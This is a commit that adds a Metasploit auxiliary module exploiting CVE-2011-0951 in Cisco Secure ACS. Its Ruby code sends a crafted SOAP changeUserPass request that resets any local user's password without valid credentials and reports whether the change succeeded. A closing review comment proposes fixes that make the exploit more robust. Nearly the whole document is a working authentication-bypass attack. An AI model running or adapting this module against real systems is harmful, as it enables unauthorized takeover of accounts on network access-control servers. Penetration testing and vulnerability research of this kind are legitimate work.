pyoor
committed
May 13, 2012
1 parent
79a590c
commit 6b6dc60
Showing
1 changed file
with
117 additions
and
0 deletions.
117 changes: 117 additions & 0 deletions
117
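--- /dev/null
+++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
@@ -0,0 +1,117 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Auxiliary::Report
+include Msf::Auxiliary::Scanner
+
+def initialize
+super(
+'Name' => 'Cisco Secure ACS Unauthorized Password Change',
+'Version' => '$Revision$',
+'Description' => %q{
+This module exploits an authentication bypass issue which allows arbitrary password
+change requests to be issued for any user in the local store.
+},
+'References' =>
+[
+['BID', '47093'],
+['CVE', 'CVE-2011-0951'],
+['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html'],
+],
+'Author' =>
+[
+'Jason Kratzer',
+'www.flinkd.org'
+],
+'License' => MSF_LICENSE
+)
+
+register_options(
+[
+Opt::RPORT(443),
+OptString.new('URI', [false, 'Path to UCP WebService', '/PI/services/UCP/']),
+OptString.new('USERNAME', [true, 'Username to use', '']),
+OptString.new('PASSWORD', [true, 'Password to use', '']),
+OptBool.new('SSL', [true, 'Use SSL', true],),
+], self.class)
+end
+
+def rport
+datastore['RPORT']
+end
+
+def run_host(ip)
+soapenv='http://schemas.xmlsoap.org/soap/envelope/'
+soapenvenc='http://schemas.xmlsoap.org/soap/encoding/'
+xsi='http://www.w3.org/1999/XMLSchema-instance'
+xsd='http://www.w3.org/1999/XMLSchema'
+ns1='ns1:changeUserPass'
+
+data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
+data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="' + soapenvenc + '" '
+data << 'xmlns:SOAP-ENC="' + soapenvenc + '" '
+data << 'xmlns:xsi="' + xsi + '" xmlns:SOAP-ENV="' + soapenv + '" '
+data << 'xmlns:xsd="' + xsd + '">' + "\r\n"
+
+data << '<SOAP-ENV:Body>' + "\r\n"
+data << '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + "\r\n"
+data << '<v1 xsi:type="xsd:string">' + datastore['USERNAME'] + '</v1>' + "\r\n"
+data << '<v2 xsi:type="xsd:string">fakepassword</v2>' + "\r\n"
+data << '<v3 xsi:type="xsd:string">' + datastore['PASSWORD'] + '</v3>' + "\r\n"
+data << '</ns1:changeUserPass>'
+data << '</SOAP-ENV:Body>' + "\r\n"
+data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
+
+print_status("Issuing password change request for: " + datastore['USERNAME'])
+
+begin
+res = send_request_raw({
+'uri' => "/#{datastore['URI']}",
+'method' => 'POST',
+'data' => data,
+'headers' =>
+{
+'Content-Length' => data.length,
+'SOAPAction' => '"changeUserPass"',
+'Content-Type' => 'text/xml; charset=UTF-8',
+}
+}, 60)
+
+rescue ::Rex::ConnectionError
+print_error("#{rhost}:#{rport} [ACS] Unable to communicate")
+return :abort
+end
+
+if not res
+print_error("#{rhost}:#{rport} [ACS] Unable to connect")
+return
+elsif res.code == 200
+body = res.body
+if body.match(/success/i)
+print_good("#{rhost} - Success! Password has been changed.")
+elsif body.match(/Password has already been used/)
+print_error("#{rhost} - Failed! The supplied password has already been used.")
+print_error("Please change the password and try again.")
+elsif body.match(/Invalid credntials for user/)
+print_error("#{rhost} - Failed! Either the username does not exist or target is not vulnerable.")
+print_error("Please change the username and try again.")
+else
+print_error("#{rhost} - Failed! An unexpected error has occurred.")
+end
+end
+
+end
+end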
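Review bot: `USERNAME` and `PASSWORD` are concatenated into the SOAP envelope unescaped on the `<v1>` and `<v3>` lines of run_host, so a value containing `<`, `&` or a quote yields a malformed XML body and the run lands in the generic "unexpected error" branch instead of reporting the real cause. Escaping with the stdlib keeps the request well-formed, e.g. `'<v1 xsi:type="xsd:string">' + REXML::Text.normalize(datastore['USERNAME']) + '</v1>'` and likewise for `<v3>` (add `require 'rexml/text'` if the framework does not already load REXML). The request path is also built as `"/#{datastore['URI']}"` while the default `URI` already begins with `/`, producing `//PI/services/UCP/`; dropping the slash from either the default or the interpolation avoids relying on the server tolerating the doubled separator. The local `ns1` assigned at the top of run_host is never referenced, since the element name is hard-coded in the body string, and can be removed.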